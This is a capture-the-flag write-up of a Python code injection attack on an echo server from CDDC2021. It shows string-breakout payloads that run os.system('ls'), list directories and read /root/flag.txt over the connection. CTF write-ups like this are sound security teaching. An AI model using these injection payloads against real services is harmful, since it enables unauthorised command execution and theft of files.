POP IT [Pwn]

2 minute read

Python code injection attack on an echo server. Third pwn challenge in CDDC2021.

Challenge Description

Your last mission, for now, looks promising. It’s some kind of an echo server. I think you can exploit it easily.

Target: 18.136.182.104 port 60230

Solution

For challenges like these, I like to spam weird characters. Luckily my first one gave me syntax error: ".

This tells me that they are not escaping my quote but is using it to terminate the string, hence having an unclosed quote at the back. Something like this:

print(""")

I took a brave guess that it is Python because of the syntax error message. So I tried to list the current directory and echo it back.

input> ");import os;print(os.system("ls"))#

Program output:

Note: this effectively does something like this (for what I had in mind at this point in time)

print("");import os;print(os.system("ls"))#")

So our payload needs to be in the form of ");<code>#

Hmmm, that means that it doesn’t use print to echo back. I played around a bit and got this:

input> ", end="asdf");#

Error: sendBack() expects 1 argument, 2 received

Sounds like some websocket is being used. So I just need to find out the variables it has and I can leak the current directory, and get the flag.

input> "+'|'.join(dir()))#

Program output: conn|functionPointer|ram|userData|userDataPointer

dir() returns all variables available in the current scope, which is perfect. conn should be the websocket connection. So I can do something like this:

input> ");import os;conn.send('\n'.join(os.listdir(os.getcwd())));#

Program output: lib64
opt
tmp
usr
home
run
libx32
proc
srv
var
dev
media
boot
lib
root
etc
sbin
bin
mnt
lib32
sys
.dockerenv

Changing the directory for a bit:

input> ");import os;conn.send(' '.join(os.listdir(os.getcwd() + 'root')));#

Program output: .bashrc .profile buffer_overflow.py exploit.sh memory flag.txt

Wait what? Buffer overflow???? XD

Final Payload

");conn.send(open('/root/flag.txt').read());#

Flag: CDDC21{Py780n_!$_N!c3}

Categories:

Updated: